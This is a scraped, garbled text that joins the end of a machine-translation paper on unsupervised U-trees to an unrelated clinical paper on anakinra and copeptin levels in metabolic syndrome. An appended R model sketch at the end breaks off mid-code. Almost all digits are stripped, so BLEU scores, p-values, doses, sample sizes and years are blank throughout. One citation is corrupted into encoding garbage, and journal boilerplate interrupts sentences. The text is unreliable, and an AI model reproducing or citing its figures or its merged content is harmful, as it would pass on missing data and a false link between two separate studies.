to create the baseline systems, we use the open-source joshua . system (ganitkevitch et al., ) to build a hierarchical phrase-based (hpb) system and a syntax-augmented mt (samt) system (zollmann and venugopal, ), respectively. the translation system used for testing the effectiveness of our u-trees is our in-house string-to-tree system (abbreviated as s t). the system is implemented based on (galley et al., ) and (marcu et al., ).
in the system, we extract both the minimal ghkm rules (galley et al., ) and the rules of the spmt model (galley et al., ) with phrases up to length l= on the source side. we then obtain composed rules by composing two or three adjacent minimal rules. to build the above s t system, we first use the parse trees generated by parsing the english side of the bilingual data with the berkeley parser (petrov et al., ). then, we binarize the english parse trees using the head binarization approach (wang et al., ) and use the resulting binary parse trees to build another s t system. for the u-trees, we run the gibbs sampler for iterations on the whole corpus. the sampler takes , s per iteration on average on a single core of a . ghz intel xeon machine. for the hyperparameters, we set α to . and pexpand = / to give preference to rules with small fragments. we built an s t translation system with the u-trees obtained after the th iteration. we only use one sample to extract the translation grammar because multiple samples would result in a grammar that would be too large. from (zollmann and vogel, ), we find that the performance of the samt system is similar to that of the method of labeling scfg rules with pos tags; thus, for convenience, we only conduct experiments with the samt system.

. analysis of the gibbs sampler

to evaluate the effectiveness of the gibbs sampler, we explore the change of the training data's likelihood with increasing sampling iterations.

figure . the training data's negative log-likelihood vs. the number of sampling iterations; the three series correspond to three independent runs of the sampler with different initial u-trees as initialization states.

figure depicts the negative log-likelihood of the training data after several sampling iterations. the results show that the overall likelihood of the training data is improved by the sampler. moreover, comparing the three independent runs, we see that although the sampler begins with different initial u-trees, the training data's likelihood is always similar during sampling. this demonstrates that our sampler is not sensitive to the random initial u-trees and can always arrive at a good final state from different initialization states. thus, we only utilize the u-trees from random for further analysis hereafter.

figure . the total number of frontier nodes vs. the number of sampling iterations for the three independent runs.

. analysis of the u-tree structure

acquiring better u-trees for translation is our final purpose. however, are the u-trees achieved by the gibbs sampler appropriate for the tree-based translation model? to answer this question, we first analyze the effect of the sampler on the u-trees. figure shows the total number of frontier nodes in the training data during sampling. the results show that the number of frontier nodes increases with increased sampling. this tendency indicates that our sampler prefers tree structures with more frontier nodes. consequently, the final u-tree structures can always be factored into many small minimal translation rules. just as we have argued in section . , this is beneficial for a good translation grammar.
to demonstrate the above analysis, figure shows a visual comparison between our u-trees (from random ) and the binary parse trees (obtained by head binarization). because the traditional parse tree is not binarized, we do not consider it for this analysis. figure shows that, whether for the target tree fragment or for the source string of a rule, our u-trees always tend to yield the smaller ones. (binary parse trees get more tree fragments with two nodes than u-trees; this is because there are many unary edges in the binary parse trees, while no unary edge exists in our u-trees.) this comparison verifies that our bayesian tree induction model is effective in shifting the tree structures away from complex minimal rules, which tend to negatively affect translation.

figure . histograms over minimal translation rule statistics comparing our u-trees and binary parse trees: the number of rules by the number of nodes in the target tree fragment, and by the number of words and variables in the source string.

specifically, we show an example of a binary parse tree and our u-tree in figure . the example u-tree is more conducive to extracting effective translation rules. for example, to translate the chinese phrase "ӵ Ѫ", we can extract a rule (r in figure ) directly from the u-tree, because the phrase "ӵ Ѫ" is governed by a frontier node, i.e., the node "vbd+rb". however, because no node governs "ӵ Ѫ" in the binary parse tree, we can only obtain a rule (r in figure ) with many extra nodes and edges, such as the node cd in r . due to these extra nodes and edges, r is too large to generalize well.

figure . example of different tree structures: (a) a binary parse tree and (b) our u-tree. the node np-comp is created by head binarization. the bold italic nodes with shadows denote frontier nodes.

figure . example rules to translate the chinese phrase "ӵ Ѫ". r is extracted from figure (a), i.e., the binary parse tree; r is from figure (b), i.e., the u-tree.

based on the above analysis, we can conclude that our proposed u-tree structures are conducive to extracting small minimal translation rules. this indicates that the u-trees are more consistent with the word alignment and are good at capturing bilingual mapping information. therefore, because parse trees are always constrained by cross-lingual structure divergence, we believe that the proposed u-trees would result in a better translation grammar. we demonstrate this conclusion in the next sub-section.

. final translation results

the final translation results are shown in table . in the table, lines - refer to the string-to-tree systems built with different types of tree structures. table shows that all our s t systems significantly outperform the joshua (hpb) and joshua (samt) systems. this comparison verifies the superiority of our in-house s t system. moreover, the results shown in table also demonstrate the effectiveness of head binarization, which helps to improve the s t system using parse trees in all translation tasks. to test the effectiveness of our u-trees, we give the s t translation system using the u-trees (from random ). the results show that the system using u-trees achieves the best translation result among all of the systems. it surpasses the s t system using parse trees by . bleu points on mt and .
bleu points on mt . moreover, even using the binary parse trees, the achieved s t system is still lower than our u-tree-based s t system by . bleu points on the combined test set. from the translation results, we can validate our former analysis that the u-trees generated by our bayesian tree induction model are more appropriate for string-to-tree translation than parse trees. system mt mt all joshua (hpb) . . . joshua (samt) . . . s t (parse-tree) . * . * . * s t (binary-parse-tree) . * . *# . * s t (u-tree) . *# . *# . *# table . results (in case-insensitive bleu- scores) of s t systems using different types of trees. the “*” and “#” denote that the results are significantly better than the joshua (samt) system and the s t system using parse trees (p< . ). . large data we also conduct an experiment on a larger bilingual training data from the ldc corpus . the training corpus contains . m sentence pairs with approximately . m chinese words and . m english words. similarly, we train a -gram language model using the xinhua portion of the english gigaword corpus and the english part of the training corpus. with the same settings as before, we run the gibbs sampler for iterations and utilize the final u-tree structure to build a string-to-tree translation system. the final bleu score results are shown in table . in the scenario with a large data, the string-to- tree system using our u-trees still significantly outperforms the system using parse trees. system mt mt all joshua (hpb) . . . joshua (samt) . . . s t (parse-tree) . * . * . * s t (binary-parse-tree) . *# . *# . *# s t (u-tree) . *# . *# . *# table . results (in case-insensitive bleu- scores) for the large training data. the meaning of “*” and “#” are similar to table . conclusion and future work in this paper, we explored a new direction to build a tree-based model based on unsupervised bayesian trees rather than supervised parse trees. to achieve this purpose, we have made two major efforts in this paper: ( ) we have proposed a novel generative bayesian model to induce effective u-trees for tree-based translation. we utilized stsg in the model to grasp bilingual mapping information. we further imposed a reasonable hierarchical prior on the tree structures, encouraging small and frequent minimal rules for translation. ( ) to train the bayesian tree induction model efficiently, we developed a gibbs sampler with three novel gibbs operators. the operators are designed specifically to explore the infinite space of tree structures by performing local changes on the tree structure. ldc category number : ldc t , ldc e , ldc e , ldc t , ldc t , ldc l , ldc t and ldc t . experiments on the string-to-tree translation model demonstrated that our u-trees are better than the parse trees. the translation results verify that the well-designed unsupervised trees are actually more appropriate for tree-based translation than parse trees. therefore, we believe that the unsupervised tree structure would be a promising research direction for tree-based translation. in future, we plan to testify our sampler with various initial trees, such as the tree structure formed by (zhang et al., ). we also plan to perform a detailed empirical comparison between stst and scfg under our settings. moreover, we will further conduct experiments to compare our methods with other relevant works, such as (cohn and blunsom, ) and (burkett and klein, ). 
acknowledgments we would like to thank philipp koehn and three anonymous reviewers for their valuable comments and suggestions. the research work has been funded by the hi-tech research and development program (“ ” program) of china under grant no. aa a , aa , and aa . references phil blunsom, trevor cohn, miles osborne. . bayesian synchronous grammar induction. in advances in neural information processing systems, volume , pages - . phil blunsom, trevor cohn, chris dyer, and miles osborne. . a gibbs sampler for phrasal synchronous grammar induction. in proc. of acl , pages - . phil blunsom and trevor cohn. . inducing synchronous grammars with slice sampling. in proc. of naacl , pages - . david burkett and dan klein. . two languages are better than one (for syntactic parsing). in proc. of emnlp , pages - . david burkett, john blitzer, and dan klein. . joint parsing and alignment with weakly synchronized grammars. in proc. of naacl , pages - . david burkett and dan klein. . transforming trees to improve syntactic convergence. in proc. of emnlp , pages - . david chiang. . hierarchical phrase-based translation. computational linguistics, ( ). pages - . dekai wu. . a polynomial-time algorithm for statistical machine translation. in proc. of acl , pages - . dekai wu. . stochastic inversion transduction grammars and bilingual parsing of parallel corpora. computational linguistics, : - . trevor cohn and phil blunsom. . a bayesian model of syntax-directed tree to string grammar induction. in proc. of emnlp , pages - . trevor cohn, phil blunsom, and sharon goldwater. . inducing tree-substitution grammars. journal of machine learning research, pages - . brooke cowan, ivona kucerova and michael collins. . a discriminative model for tree-to-tree translation. in proc. of emnlp , pages - . john denero and dan klein. . tailoring word alignments to syntactic machine translation. in proc. of acl , pages - . john denero and jakob uszkoreit. . inducing sentence structure from parallel corpora for reordering. in proc. of emnlp , pages - . chris dyer. . two monolingual parses are better than one (synchronous parse). in proc. of naacl , pages - . jason eisner. . learning non-isomorphic tree mappings for machine translation. in proc. of acl , pages - . michel galley, mark hopkins, kevin knight and daniel marcu. . what’s in a translation rule. in proc. of hlt-naacl , pages – . michel galley, jonathan graehl, kevin knight, daniel marcu, steve deneefe, wei wang and ignacio thayer. . scalable inference and training of context-rich syntactic translation models. in proc. of acl-coling , pages - . jonathan weese, juri ganitkevitch, chris callison- burch, matt post and adam lopez. . joshua . : syntax-based machine translation with the thrax grammar extractor. in proc of wmt , pages - . liang huang, kevin knight and aravind joshi. . a syntax-directed translator with extended domain of locality. in proc. of amta , pages - . philipp koehn, franz och, and daniel marcu. . statistical phrase-based translation, in proc. of hlt/naacl , pages - . philipp koehn. . statistical significance tests for machine translation evaluation. in proc. of emnlp , pages – . philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richdug� =hqv�� &kulv� '\hu� dqg� qgĜhm� %rmdu. . moses: open source toolkit for statistical machine translation. in proc. of acl , pages - . abby levenberg, chris dyer and phil blunsom. . 
a bayesian model for learning scfgs with discontiguous rules. in proc. of emnlp , pages - . zhifei li, chris callison-burch, chris dyer, juri ganitkevitch, sanjeev khudanpur, lane schwartz, wren n.g. thornton, jonathan weese and omar f. zaidan. . joshua: an open source toolkit for parsing-based machine translation. in proc. of acl , pages - . shujie liu, chi-ho li, mu li, ming zhou. . re- training monolingual parser bilingually for syntactic smt. in proc. of emnlp , pages - . yang liu, qun liu and shouxun lin. . tree-to- string alignment template for statistical machine translation. in proc. of acl-coling , pages - . yang liu, yajuan lv and qun liu. . improving tree-to-tree translation with packed forests. in proc. of acl-ijcnlp , pages - . daniel marcu, wei wang, abdessamad echihabi and kevin knight. . spmt: statistical machine translation with syntactified target language phrases. in proc. of emnlp , pages - . franz och, . minimum error rate training in statistical machine translation. in proc. of acl , pages - . kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic evaluation of machine translation. in proc. of acl , pages - . slav petrov, leon barrett, romain thibaux and dan klein. . learning accurate, compact, and interpretable tree annotation. in proc. of coling- acl , pages - . chris quirk, arul menezes and colin cherry. . dependency treelet translation: syntactically informed phrasal smt. in proc. of acl , pages - . libin shen, jinxi xu and ralph weischedel. . a new string-to-dependency machine translation algorithm with a target dependency language model. in proc. of acl- , pages - . wei wang, kevin knight, and daniel marcu. . binarizing syntax trees to improve syntax-based machine translation accuracy. in proc. of emnlp , pages - . wei wang, jonathan may, kevin knight, and daniel marcu. . re-structuring, re-labeling, and re- aligning for syntax-based machine translation. computational linguistics, ( ): – . feifei zhai, jiajun zhang, yu zhou and chengqing zong. . tree-based translation without using parse trees. in proc. of coling , pages - . hao zhang, liang huang, daniel gildea and kevin knight. . synchronous binarization for machine translation. in proc. of hlt-naacl , pages - . hao zhang, daniel gildea, and david chiang. . extracting synchronous grammars rules from word level alignments in linear time. in proc. of coling , pages - . hao zhang, licheng fang, peng xu, xiaoyun wu. a. binarized forest to string translation. in proc. of acl , pages - . hui zhang, min zhang, haizhou li, aiti aw, chew lim tan. . forest-based tree sequence to string translation model. in proc. of acl-ijcnlp , pages - . jiajun zhang, feifei zhai and chengqing zong. b. augmenting string-to-tree translation models with fuzzy use of source-side syntax. in proc. of emnlp , pages - . min zhang, hongfei jiang, ai ti aw, jun sun, chew lim tan and sheng li. . a tree-to-tree alignment-based model for statistical machine translation. mt-summit- . pages - min zhang, hongfei jiang, ai ti aw, haizhou li, chew lim tan and sheng li. . a tree sequence alignment-based tree-to-tree translation model. in proc. of acl , pages - . andreas zollmann and ashish venugopal. . syntax augmented machine translation via chart parsing. in proc. of workshop on statistical machine translation , pages - . andreas zollmann and stephan vogel. . a word- class approach to labeling pscfg rules for machine translation. in proc. of acl , pages - . : – m popovic et al. 
the role of il- in the regulation of copeptin research the role of il- in the regulation of copeptin in patients with metabolic syndrome milica popovic , , fahim ebrahimi , , sandrine andrea urwyler , , marc yves donath , and mirjam christ-crain , department of endocrinology, diabetology and metabolism, university hospital basel, basel, switzerland department of clinical research, university of basel and university hospital basel, basel, switzerland department of biomedicine, university of basel, basel, switzerland correspondence should be addressed to m christ-crain: mirjam.christ-crain@usb.ch abstract arginine vasopressin (avp) was suggested to contribute to cardiovascular risk and type diabetes in patients with metabolic syndrome. the proinflammatory cytokine interleukin (il)- is able to induce avp secretion and plays a causal role in cardiovascular mortality and type diabetes. we investigated in two studies whether copeptin levels – the surrogate marker for avp – are regulated by il- -mediated chronic inflammation in patients with metabolic syndrome. study a was a prospective, interventional, single-arm study ( – ). study b was a randomized, placebo-controlled, double-blind study ( – ). n =  (study a) and n =  (study b) adult patients with metabolic syndrome were treated with mg anakinra or placebo (only in study b) twice daily for day (study a) and days (study b). fasting blood samples were drawn at day , , and of treatment for measurement of serum copeptin. patients with chronic low-grade inflammation (c-reactive protein levels ≥ mg/l) and bmi > kg/m had higher baseline copeptin levels ( . (iqr . – . ) vs . (iqr . – . ) pmol/l, pinflamm =  . ; . (iqr . – . ) vs . (iqr . – . ) pmol/l, pbmi =  . ). copeptin levels did not change either in the anakinra or in the placebo group and remained stable throughout the treatment (p =  . ). subgroup analyses did not reveal effect modifications. therefore, we conclude that, although il- -mediated inflammation is associated with increased circulating copeptin levels, antagonizing il- does not significantly alter copeptin levels in patients with metabolic syndrome. introduction patients with metabolic syndrome are at significant risk for developing type diabetes mellitus and cardiovascular diseases ( ). arginine vasopressin (avp) was suggested to play a causal role in the development of type diabetes mellitus and cardiovascular disease ( ). indeed, several studies have demonstrated that copeptin – the c-terminal part of the avp precursor and surrogate marker for avp ( ) – predicts insulin resistance and onset of type diabetes mellitus ( , , , , , , ) and is associated with an increased cardiovascular mortality in patients with metabolic syndrome ( , , , ). there are several potential pathways by which avp might mediate cardiovascular risk and type diabetes. first, avp leads to an amplification of cortisol release by inhibiting negative feedback on adrenocorticotropic hormone secretion from the anterior pituitary gland and by direct stimulation of the adrenal cortex ( , ). moreover, avp induces epinephrine secretion by stimulation of the chromaffin cells in the adrenal medulla ( ) and stimulates glycogenolysis and gluconeogenesis via v a receptors in the liver ( ). furthermore, avp has antilipolytic ( ) and prothrombotic ( ) effects and mediates coronary vasoconstriction through vasopressin a receptors ( ). the mechanisms underlying the upregulation of avp/ copeptin levels in patients with metabolic syndrome are unknown. 
interestingly, copeptin seems to be strongly - - key words f metabolic syndrome f copeptin f arginine vasopressin f interleukin- f low-grade inflammation endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:mirjam.christ-crain@usb.ch https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m popovic et al. the role of il- in the regulation of copeptin pb–xx : associated with elevated levels of c-reactive protein (crp) ( , , , ). elevated crp levels in patients with metabolic syndrome result from a chronic activation of the il- system, a key cytokine stimulated by metabolic stress ( ). chronic low-grade inflammation enacted through il- activity was recently shown to play a causal role in the development of both type diabetes mellitus and cardiovascular disease. randomized treatment with il- antagonists has proven capacity to reduce hba c levels in patients with type diabetes mellitus and to reduce cardiovascular mortality in patients with coronary heart disease and elevated levels of crp ( , ). interestingly, there seems to be an interplay between il- and avp, since animal experiments have shown induction of avp secretion in response to il- application ( , , ), although there is conflicting data in a rat model of sepsis ( ). we, therefore, hypothesize that the increased levels of copeptin observed in patients with metabolic syndrome are caused by an overactivity of il- and that antagonism of the il- pathway would lead to a reduction of copeptin levels. in this study, we report the results of two interventional trials investigating effects of il- antagonism in obese individuals with metabolic syndrome. methods this is a preplanned secondary analysis of two interventional trials ( , ). both trials were conducted according to the ethical guidelines of the declaration of helsinki and the applicable international conference on harmonization (ich) guidelines on good clinical practice. both trials were approved by the ethics committee northwest and central switzerland (eknz) and swissmedic and were registered on clinicaltrials.gov (nct , nct ). all patients provided written informed consent. patients were recruited at two tertiary care centers in switzerland (university hospital basel and kantonsspital aarau). study a: patients and trial design study a was a prospective, open-labeled, interventional trial investigating short-term (= day) effects of il- receptor antagonism in obese patients with metabolic syndrome. detailed study procedures have been published previously ( ). briefly, inclusion criteria were age between and years, body-mass index (bmi) > kg/m and at least one of the following additional features of the metabolic syndrome: hyperglycemia (hba c > . %), hypertension (blood pressure (bp) > / mmhg or bp lowering therapy), or dyslipidemia (hdl-c < . mmol/l or triglycerides > . mmol/l or low-density-lipoprotein- cholesterol (ldl-c) > . mmol/l or lipid lowering treatment). main exclusion criteria were concurrent medication with glucocorticoids, known cushing’s syndrome, an underlying chronic inflammatory disease, history of a severe infection within the previous months or a current infection, severe comorbidities and pregnancy or breastfeeding. 
after the screening visit, all patients received three s.c. injections of the recombinant human interleukin- -receptor antagonist anakinra/kineret® mg within days. the consecutive injections were started at : h and continued in a time interval of h. the study-visits assessed in this analysis were ‘baseline’ (=’day ’) and after three injections of the il- antagonist anakinra/kineret® (=’day ’). study visits were scheduled in the morning between : h and : h after an overnight fast and blood samples were drawn at both visits. study b: patients and trial design study b was a randomized, placebo-controlled, double- blind, interventional trial investigating short- as well as long-term effects of il- receptor antagonism in patients. a detailed description of study procedures was published previously ( ). main eligibility criteria were similar to study a. as study b was primarily designed to investigate the effect of il- antagonism on testosterone levels in obese men with low levels of testosterone, all patients were male, aged to years with a bmi > kg/m and total testosterone levels < nmol/l. patients were randomized : to receive either anakinra/kineret® mg or placebo as s.c. injection twice daily in a time interval of h. study visits were scheduled in the morning at baseline (day ), at day (short-term visit), at day and at weeks. blood samples were drawn at every visit. therefore, patients were instructed not to eat or drink after midnight before the study visits in both studies. laboratory analyses routine laboratory parameters, that is, total cholesterol, hdl cholesterol, hba c, and triglyceride levels, this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m popovic et al. the role of il- in the regulation of copeptin : were analyzed at the local laboratories of the participating centers. at the university hospital basel, all routine parameters were measured on the cobas c (roche). at the kantonsspital aarau, total and hdl cholesterol were measured by immunoassay on the architect i sr (abbott), and hba c analysis was performed with the d- testing systems by biorad. in both centers, ldl cholesterol levels were calculated using the friedewald formula ( ). crp was determined with an immunoturbidimetric assay (tina-quant c-reactive protein gen. test; roche diagnostics gmbh). plasma copeptin levels were measured with a commercial automated immunofluorescence assay (b.r.a.h.m.s copeptin-proavp kryptor, brahms gmbh, part of thermo fisher scientific) in a batch analysis. for this, edta blood samples were centrifuged at °c and stored at − °c. statistical analysis copeptin values were log-transformed in order to achieve a distribution analog to normal distribution. thereby, one patient had to be excluded due to an extreme value at baseline of pmol/l, resulting in n = patients for study b. unless stated otherwise, categorical variables are expressed as count (percentage) and continuous variables as means (±s.d.). in a first analysis, we aimed to investigate which parameters are associated with higher copeptin levels at baseline. 
therefore, linear regression models were calculated with log-transformed copeptin as dependent variable and the respective parameter as explanatory variable. all analyses were adjusted for sex. afterwards, the statistically significant variables were selected for the combined analysis. these variables were combined (=added) as explanatory variables in one linear regression model to investigate which factors are independently associated with higher copeptin. to assess treatment effects on copeptin levels, we used a linear mixed effects model with treatment group and baseline copeptin levels as fixed effect and participant id as random effect. to investigate whether defined subgroups of patients responded differently to treatment with anakinra, we conducted subgroup analyses. for this, linear regression models were calculated with log- transformed copeptin as dependent variable and the following interaction term as explanatory variable: treatment group * subgroup variable. these analyses were adjusted for baseline copeptin levels, treatment day, and sex. all p-values are two-sided and have not been adjusted for multiple testing. statistical analyses were performed and graphs drawn using r i version . . . results baseline characteristics baseline characteristics of the patients in study a and patients in study b are shown in table . in study b, the baseline characteristics were well-balanced between the two treatment groups. to summarize briefly, . % vs % of the patients were male in study a and b, respectively. mean age was years. mean bmi was approximately kg/m with nearly all patients having visceral obesity. around % of the patients presented with chronic low-grade inflammation (defined by a crp level of ≥ mg/l). in study a, . % of the patients suffered from either prediabetes or type diabetes compared to . % in study b. furthermore, % of the patients in study a were treated with antihypertensive medication, whereas % had antihypertensive drugs in study b. baseline copeptin levels figure shows baseline copeptin levels for different subgroups. patients with chronic low-grade inflammation had significantly higher median copeptin levels than those without ( . (iqr . – . ) vs . (iqr . – . ) pmol/l, p = . , fig. a). we observed an increase in median copeptin levels in dependence of diabetic status, that is, median copeptin levels for patients without diabetes were . (iqr . – . ) pmol/l, for those with prediabetes . (iqr . – . ) pmol/l, and . (iqr . – . ) pmol/l for patients with overt type diabetes (overall p = . , fig. b). the same held true for patients with and without ( ) antihypertensive treatment ( . (iqr . – . ) vs . (iqr . – . ) pmol/l, p = . , fig. c), ( ) lipid-lowering treatment ( . (iqr . – . ) vs . (iqr . – . ) pmol/l, p = . , fig. d), and ( ) for patients with bmi above or below kg/m ( . (iqr . – . ) vs . (iqr . – . ) pmol/l, p = . , fig. e). when adding all the investigated parameters (i.e. chronic low-grade inflammation, diabetic status, antihypertensive, and lipid-lowering treatment, and bmi categories) in one model, only chronic low-grade inflammation and bmi remained significantly associated with high copeptin (pinflamm < . , pbmi = . ). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . 
/ https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m popovic et al. the role of il- in the regulation of copeptin pb–xx : effect of il- receptor antagonism on copeptin levels median copeptin levels at baseline were . (iqr . – . ) pmol/l in the anakinra group and . (iqr . – . ) pmol/l in the placebo group. after treatment initiation, copeptin levels did not change either in the anakinra or in the placebo group and remained stable throughout the treatment (p = . ; table , fig. ). subgroup analyses were performed for ( ) chronic low-grade inflammation, ( ) diabetes status, ( ) bmi below or above kg/m , and ( ) baseline copeptin levels according to a stratification of baseline copeptin values into tertile categories of baseline copeptin. the results are depicted in fig. a, b, c, d. treatment was no significant variable in any of the four subgroups. only the interaction p for chronic low-grade inflammation and treatment was below . , suggesting that anakinra has a different effect in patients with chronic low-grade inflammation at baseline compared to those without. however, data exploration revealed a high probability of a type i error due to randomly large differences in baseline copeptin levels between the two treatment groups in the subgroup without chronic low-grade inflammation. furthermore, the effect size was very small (− . pmol/l) and has no clinical relevance. discussion in this analysis we present the following main findings: first, presence of ( ) chronic low-grade inflammation, as shown with increased crp levels, and ( ) a bmi of > kg/m was independently associated with higher copeptin levels in patients with metabolic syndrome. second, treatment with the il- receptor antagonist anakinra did not lead to a reduction of copeptin levels in this patient population. there was also no relevant effect of il- antagonism in any of the analyzed subgroups. numerous studies have described associations of high copeptin levels with the metabolic syndrome. most of them found that this association did not persist after adjusting for the single components of the metabolic syndrome. however, according to several studies, copeptin levels remained independently associated with obesity ( , , , , ), insulin resistance ( , , , ), and chronic low-grade inflammation ( , , ). these results are in accordance with our findings. table  baseline characteristics. variable study a study b treatment group anakinra (n =  ) anakinra (n =  ) placebo (n =  ) age ( ) ( ) ( ) male sex ( ) ( ) ( ) bmi (kg/m ) . ( . ) . ( . ) . ( . ) visceral obesity ( ) ( ) ( ) alcohol consumption (glasses/week) . ( . ) . ( . ) . ( . ) smokers ( ) ( ) ( ) ethnicity (caucasian) ( ) ( ) ( ) systolic blood pressure (mmhg) ( ) ( ) ( ) diastolic blood pressure (mmhg) ( ) ( ) ( ) heart rate (bpm) ( ) ( ) ( ) crp (mg/l) . ( . ) . ( . ) . ( . ) chronic low-grade inflammation ( . ) ( . ) ( . ) cholesterol, total (mmol/l) . ( . ) . ( . ) . ( . ) hdl-c (mmol/l) . ( . ) . ( . ) . ( . ) ldl-c (mmol/l) . ( . ) . ( . ) . ( . ) copeptin (pmol/l) . ( . ) . ( . ) . ( . ) hba c (%) . ( . ) . ( . ) . ( . ) triglycerides (mmol/l) . ( . ) . ( . ) . ( . ) waist circumference (cm) ( ) ( ) ( ) no diabetes ( . ) ( . ) ( . ) prediabetes ( . ) ( . ) ( . ) diabetes mellitus ( . ) ( . ) ( . ) treatment with oad ( . ) ( . ) ( . ) antihypertensive medication ( . ) ( . ) ( . ) treatment with statins ( . ) ( . ) ( . ) antidepressive medication ( . ) ( . ) ( . ) antipsychotic medication ( . ) ( . ) ( . 
) variables are summarized as mean (s.d.) or counts (%) if not otherwise specified. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m popovic et al. the role of il- in the regulation of copeptin : obesity, especially of the visceral type, is considered the driving factor for the development of insulin resistance and type diabetes ( ). furthermore, visceral obesity evokes a chronic pro-inflammatory state ( ). chronic low-grade inflammation plays an important role in the destruction of the β-cells of the pancreas ( ). concordantly, it was shown that antagonism of the il- pathway ameliorates glucose metabolism in patients with type diabetes ( ). there are experimental data showing stimulating effects of il- on avp secretion from the neurohypophysis ( , , ). therefore, the increased copeptin levels observed in the metabolic syndrome might be induced by il- -driven chronic low-grade inflammation. in this case, blocking the il- pathway would lead to a reduction of avp/copeptin levels in patients with metabolic syndrome. to our knowledge, our study is the first to investigate the effects of il- antagonism on the regulation of avp/ copeptin levels in patients with metabolic syndrome. interestingly, however, we did not observe any effects of the il- antagonist anakinra on copeptin levels in our study patients. in the original studies, we showed that the il- antagonist significantly down-regulated inflammation mirrored by crp and interleukin- levels as early as at day of treatment ( , ). despite this clear anti-inflammatory action of anakinra, we observed no effect on copeptin levels. we, therefore, conclude that systemic il- is not a major regulator of copeptin levels in the metabolic syndrome. thus, the question, which factor leads to the upregulation of copeptin levels in patients with metabolic syndrome, remains open. possibly, obesity might be the underlying factor for both, chronic low-grade inflammation and high copeptin levels. visceral obesity represents a metabolic stress state leading not only to the secretion of proinflammatory cytokines ( ), but also to a chronic activation of the sympathetic nervous system which is most obviously mirrored by elevation of blood pressure ( ). activation of the sympathetic nervous system is recognized as a non-osmotic stimulus for the secretion of avp/copeptin ( ). therefore, it is possible that the chronic metabolic stress in obesity increases avp/ copeptin levels, which is mediated by sympathetic nervous figure  (a–e) log-transformed copeptin values according to different subgroups. log-transformed copeptin values measured at baseline are shown on the y-axis according to different subgroups. (a) patients with and without chronic low-grade inflammation as defined by c-reactive protein values of < or ≥ mg/l at baseline. (b) diabetic status was determined by medical history and hba c cut-offs, ≥ . % as overt type diabetes and . – . % defined as prediabetes. (c and d) patients with or without any antihypertensive (c) and lipid-lowering (d) medication at baseline. (e) subgroup according to bmi at baseline. *p <  . , **p <  . . 
figure  change in copeptin levels from baseline according to treatment group copeptin values at day , and were subtracted from baseline and split according to the treatment group. the difference is depicted on the y-axis. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m popovic et al. the role of il- in the regulation of copeptin pb–xx : activity. interestingly, and in support of this hypothesis, loncar et al. reported a reduction of copeptin levels after initiation of beta-blockade treatment in patients with heart failure and reduced ejection fraction ( ). as our study patients were already obese at study inclusion, we cannot conclude from our data whether obesity per se is the driving force for high copeptin levels. to investigate this hypothesis, data before and after weight gain through overfeeding or lack of physical exercise are required. however, surprisingly, we found only one abstract reporting study results on copeptin levels before and after weight loss so far. in this study by aktimur et  al., weight loss induced by bariatric surgery led to a significant decrease in copeptin levels, arguing for a causal role of obesity in high copeptin levels ( ). nevertheless, a bidirectional relationship between elevated avp/copeptin levels and obesity needs to be considered. in this regard, enhörning et al. showed in a longitudinal analysis that high copeptin levels at baseline predicted the development of abdominal obesity and type diabetes after . years of follow-up ( ). the authors suggested that avp might play a causal role in the development of these two conditions by enhancing gluconeogenesis and glycogenolysis in the liver through vasopressin a receptors ( , ) and through antilipolytic effects ( ). furthermore, it might lead to hyperinsulinemia through activation of vasopressin b table  effects of il- receptor antagonism on copeptin levels. copeptin (pmol/l) anakinra (n =  , n =  in study a, n =  in study b) placebo (n =  , study b) absolute values change from baseline absolute values change from baseline baseline . ( . – . ) – . ( . – . ) – day . ( . – . ) . (− . – . ) . ( . – . ) . (− . – . ) day . ( . – . ) . (− . – . ) . ( . – . ) − . (− . – . ) day . ( . – . ) − . (− . – . ) . ( . – . ) . (− . – . ) variables are summarized as medians (iqr). for the rows ‘baseline’ and ‘day ’, patients from both studies a and b were included. for ‘day ’ and ‘day ’, only data from study b were available. figure  (a–d) change in copeptin levels from baseline according to treatment group – subgroup analyses. patients were divided into subgroups according to the presence of (a) chronic low-grade inflammation, as defined by c-reactive protein values of < or ≥ mg/l at baseline, (b) diabetic status at baseline which was determined by medical history and hba c cut-offs, ≥ . % as overt type diabetes and . – . % defined as prediabetes, (c) according to bmi at baseline, (d) according to baseline copeptin levels in the highest tertile (≥ . pmol/l). copeptin values at day , and were subtracted from baseline and split according to the treatment group. the difference in copeptin values according to the subgroup is depicted on the y-axis. 
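The treatment-effect and subgroup models behind the table and figure above could be sketched in R roughly as follows. This is an illustrative reconstruction with assumed names (a hypothetical long-format data frame `visits` and its columns), not the authors' code; it uses the lme4 package for the mixed model.

```r
library(lme4)

# Linear mixed-effects model: treatment group and baseline copeptin as fixed
# effects, participant id as a random intercept (repeated measures per patient).
fit_treatment <- lmer(log(copeptin) ~ treatment + baseline_copeptin + (1 | id),
                      data = visits)
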